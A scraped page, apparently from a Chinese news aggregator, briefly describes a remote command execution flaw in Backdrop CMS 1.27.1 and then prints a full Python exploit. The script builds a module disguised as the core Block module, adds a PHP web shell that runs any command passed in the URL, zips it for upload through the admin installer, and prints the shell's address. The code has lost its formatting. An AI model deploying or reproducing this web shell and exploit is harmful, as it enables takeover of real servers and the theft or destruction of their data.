index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html
![]()
Backdrop CMS 1.27.1 版本中存在一个远程命令执行漏洞,攻击者可以通过上传一个恶意模块,利用该漏洞执行任意命令。该漏洞源于模块安装过程中的安全漏洞,攻击者可以通过上传一个包含恶意代码的模块,从而获得对目标服务器的控制权。
💥 该漏洞允许攻击者在目标服务器上执行任意命令,从而获得对目标服务器的完全控制权。
💥 攻击者可以通过上传一个包含恶意代码的模块,利用该漏洞执行任意命令。
💥 攻击者可以通过该漏洞窃取敏感信息、破坏系统数据、安装恶意软件等。
💥 该漏洞影响了 Backdrop CMS 1.27.1 版本,建议用户尽快升级到最新版本以修复该漏洞。
Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE)# Date: 04/27/2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://backdropcms.org/# Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip# Version: latest# Tested on: MacOSimport osimport timeimport zipfiledef create_files():info_content = """type = modulename = Blockdescription = Controls the visual building blocks a page is constructedwith. Blocks are boxes of content rendered into an area, or region, of aweb page.package = Layoutstags[] = Blockstags[] = Site Architectureversion = BACKDROP_VERSIONbackdrop = 1.xconfigure = admin/structure/block; Added by Backdrop CMS packaging script on 2024-03-07project = backdropversion = 1.27.1timestamp = 1709862662"""shell_info_path = "shell/shell.info"os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluştururwith open(shell_info_path, "w") as file:file.write(info_content)shell_content = """<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?phpif(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body></html>"""shell_php_path = "shell/shell.php"with open(shell_php_path, "w") as file:file.write(shell_content)return shell_info_path, shell_php_pathdef create_zip(info_path, php_path):zip_filename = "shell.zip"with zipfile.ZipFile(zip_filename, 'w') as zipf:# Dosyaları shell klasörü altında saklazipf.write(info_path, arcname='shell/shell.info')zipf.write(php_path, arcname='shell/shell.php')return zip_filenamedef main(url):print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")time.sleep(3)print("Evil module generating...")time.sleep(2)info_path, php_path = create_files()zip_filename = create_zip(info_path, php_path)print("Evil module generated!", zip_filename)time.sleep(2)print("Go to " + url + "/admin/modules/install and upload the " +zip_filename + " for Manual Installation.")time.sleep(2)print("Your shell address:", url + "/modules/shell/shell.php")if name == "main":import sysif len(sys.argv) < 2:print("Usage: python script.py [url]")else:main(sys.argv[1])
